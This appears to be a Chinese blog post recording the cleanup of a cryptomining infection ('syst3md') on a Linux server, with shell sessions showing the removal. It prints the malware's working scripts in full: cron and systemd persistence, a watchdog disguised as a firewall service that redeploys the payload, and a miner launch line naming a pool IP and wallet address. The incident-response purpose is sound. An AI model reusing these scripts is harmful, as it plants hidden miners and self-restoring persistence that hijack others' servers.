记录一次syst3md挖矿病毒排查过程

公司服务器被挖矿了，idc处理也没处理干净，登陆服务器查看还是有残留的任务。

[root@nfs ~]# crontab -l
@daily /dev/shm/.lr/1
@reboot /dev/shm/.lr/run > /dev/null 2>&1 & disown
@monthly /dev/shm/.lr/run  > /dev/null 2>&1 & disown
#确认服务器ps未被修改
[root@nfs ~]# rpm -qf `which ps`
procps-ng-3.3.10-23.el7.x86_64
#检查文件完整性
[root@nfs ~]# rpm -V procps-ng

查看定时任务中脚本的内容

[root@nfs ~]# cat /dev/shm/.lr/1
#!/bin/bash
#made by Maz4id#1363
locatie=$(cat /tmp/.SQL/.db)

if ! pgrep -x syst3md >/dev/null; then
	$locatie/./syst3md -o 92.42.44.100:1111 -u 48Y15PX7Ua4b7pDWB62vSeH5RpDrKJiDjjfP7mcimSQJgAEAzNbyYvfcZco5abYJmY727sPx2zyN9AKs85XBvt1UCnWhP4L --donate-level 1 -p auto4 > /dev/null 2>&1 & disown $*
else
	:
fi
[root@nfs ~]# cat /dev/shm/.lr/run
#!/bin/bash
#made by Maz4id#1363
if [ $# != 1 ]; then
        echo " usage: $0 > /dev/null 2>&1 & disown"
fi

locatie=$(cat  /tmp/.SQL/.db)
if [ -f  /tmp/.SQL/.db ]; then
	:
else
	if [ -d  /tmp/.SQL ]; then
		echo $(pwd) >  /tmp/.SQL/.db
	else
		mkdir  /tmp/.SQL
		echo $(pwd) >  /tmp/.SQL/.db
	fi
fi

crontabcalumea() {
	if ! crontab -l | grep -q 'run'; then
		rm -rf $(cat  /tmp/.SQL/.db)/.tempo
		echo "@daily $(cat  /tmp/.SQL/.db)/1" >> $(cat  /tmp/.SQL/.db)/.tempo
		sleep 1
		echo "@reboot $(cat  /tmp/.SQL/.db)/run > /dev/null 2>&1 & disown" >> $(cat  /tmp/.SQL/.db)/.tempo
		sleep 1
		echo "@monthly $(cat  /tmp/.SQL/.db)/run  > /dev/null 2>&1 & disown" >> $(cat  /tmp/.SQL/.db)/.tempo
		sleep 1
		crontab $(cat  /tmp/.SQL/.db)/.tempo
		sleep 1
		rm -rf $(cat  /tmp/.SQL/.db)/.tempo
	fi
}


sleep 5
while :
do
$(cat  /tmp/.SQL/.db)/1
crontabcalumea
sleep 5
done

可以看到脚本在服务器删创建隐藏的文件夹并向外部ip发送信息。这是先删除脚本中涉及的路径

[root@nfs ~]# rm -rf /tmp/.SQL/.db /tmp/.SQL /dev/shm/.lr/
#结束syst3md进程
[root@nfs ~]# ps aux|grep syst3md
root      8897  0.6 31.2 2617096 1210876 ?     Sl   6月11 695:26 /dev/shm/.lr/./syst3md -o 92.42.44.100:1111 -u 48Y15PX7Ua4b7pDWB62vSeH5RpDrKJiDjjfP7mcimSQJgAEAzNbyYvfcZco5abYJmY727sPx2zyN9AKs85XBvt1UCnWhP4L --donate-level 1 -p auto4
[root@nfs ~]# kill -9 8897
[root@nfs ~]# ps aux|grep syst3md
root     30940  0.0  0.0 112824   980 pts/0    R+   09:02   0:00 grep --color=auto syst3md
#清理crontab任务
[root@nfs ~]# crontab -l
#清理之后任务又出现了
[root@nfs ~]# crontab -l
@daily /1
@monthly /run  > /dev/null 2>&1 & disown
@reboot /run > /dev/null 2>&1 & disown
@reboot /run > /dev/null 2>&1 & disown
#查看/var/log/message日志
Aug 28 09:05:34 nfs Diskutilization: /usr/bin/blrvdlm.sh: 第 15 行:cd: /dev/shm/.lr: 没有那个文件或目录
Aug 28 09:05:34 nfs Diskutilization: /usr/bin/blrvdlm.sh:行15: ./r: 没有那个文件或目录
Aug 28 09:05:34 nfs Diskutilization: /usr/bin/blrvdlm.sh: 第 19 行:cd: /dev/shm/.lr: 没有那个文件或目录
Aug 28 09:05:34 nfs Diskutilization: /usr/bin/blrvdlm.sh:行19: ./r: 没有那个文件或目录
Aug 28 09:05:34 nfs Diskutilization: Failed to start  with command1 and command2.
Aug 28 09:05:34 nfs Diskutilization: Checking if it's a directory problem
Aug 28 09:09:36 nfs systemd: blrvdlm.service: main process exited, code=killed, status=9/KILL
Aug 28 09:09:37 nfs systemd: Unit blrvdlm.service entered failed state.
Aug 28 09:09:37 nfs systemd: blrvdlm.service failed.

#上面提示的/usr/bin/blrvdlm.sh脚本，查看内容
[root@nfs ~]# cat /usr/bin/blrvdlm.sh
#!/bin/bash
#Blr va da la muie lachetilor <3
# Set the name of the process to check for
process_name="syst3md"
location="/dev/shm/.lr"
# Check if the process is running
while :
do
if ps aux | grep -v grep | grep "syst3md" > /dev/null; then
  echo "Firewall is running."
  sleep 10
else
  echo "Firewall is not running. Starting it now..."
  sleep 10
  cd /dev/shm/.lr ; ./r

  # Try to execute commands to start the process
  if
  cd /dev/shm/.lr ; ./r
  then
    echo "Successfully started ."
    sleep 10
  else
    echo "Failed to start  with command1 and command2."
    echo "Checking if it's a directory problem"
    sleep 10

      # Verify if a directory exists or not
      if [ -d /dev/shm/.lr/run ]
      then
        echo "Directory exists."
      else
        echo "Directory does not exist."
        echo "Loading payload!"
        rm -rf /dev/shm/.lr ; cp /tmp/.../.lr.zip /dev/shm/ ; cd /dev/shm ; unzip .lr ; rm -rf .lr.zip ; cd .lr ; chmod +x * ; ./r
        sleep 60
    fi
  fi
fi
done

上面日志中还涉及了blrvdlm.service服务，查看服务

[root@nfs ~]# systemctl status blrvdlm.service
● blrvdlm.service - Linux Firewall Execution
   Loaded: loaded (/etc/systemd/system/blrvdlm.service; disabled; vendor preset: disabled)
   Active: active (running) since 一 2023-08-28 09:10:07 CST; 1min 10s ago
     Docs: https://lfdblr.com/
 Main PID: 707 (blrvdlm.sh)
    Tasks: 2
   Memory: 308.0K
   CGroup: /system.slice/blrvdlm.service
           ├─707 /bin/bash /usr/bin/blrvdlm.sh
           └─799 sleep 60
#停止并删除上面的进程
[root@nfs ~]# systemctl stop --now blrvdlm.service
#查看服务文件内容
[root@nfs ~]# cat /etc/systemd/system/blrvdlm.service
[Unit]
Description=Linux Firewall Execution
Documentation=https://lfdblr.com/

[Service]
Type=simple
User=root
Group=root
TimeoutStartSec=0
Restart=on-failure
RestartSec=30s
#ExecStartPre=
ExecStart=/usr/bin/blrvdlm.sh
SyslogIdentifier=Diskutilization
#ExecStop=

[Install]
WantedBy=multi-user.target
#结束blrvdlm.sh并删除对应文件
[root@nfs ~]# rm -rf /etc/systemd/system/blrvdlm.service
[root@nfs ~]# systemctl daemon-reload
[root@nfs ~]# ps aux|grep "blrvdlm.sh"
root       549  0.0  0.0 112824   992 pts/0    S+   09:09   0:00 grep --color=auto blrvdlm.sh
root      1499  0.0  0.0 114004  1392 ?        Ss   6月11  38:31 /bin/bash /usr/bin/blrvdlm.sh
[root@nfs ~]# kill -9 1499
[root@nfs ~]# rm -rf /usr/bin/blrvdlm.sh
#查看定时任务中的sh是否有未结束的进程
[root@nfs ~]# ps aux|grep -Ei ".lr/1|.lr/run"
root       927  0.0  0.0 113792  1428 ?        S    7月01  74:25 /bin/bash /dev/shm/.lr/run
root      2137  0.0  0.0 112824  1016 pts/0    R+   09:16   0:00 grep --color=auto -Ei .lr/1|.lr/run
root     25379  0.0  0.0 113792  1940 ?        S    8月01  34:36 /bin/bash /dev/shm/.lr/run
#停止进程
[root@nfs ~]# kill -9 927 25379
#清除定时任务后再次查看，挖矿脚本已彻底删除
[root@nfs ~]# watch -n 2 "crontab -l"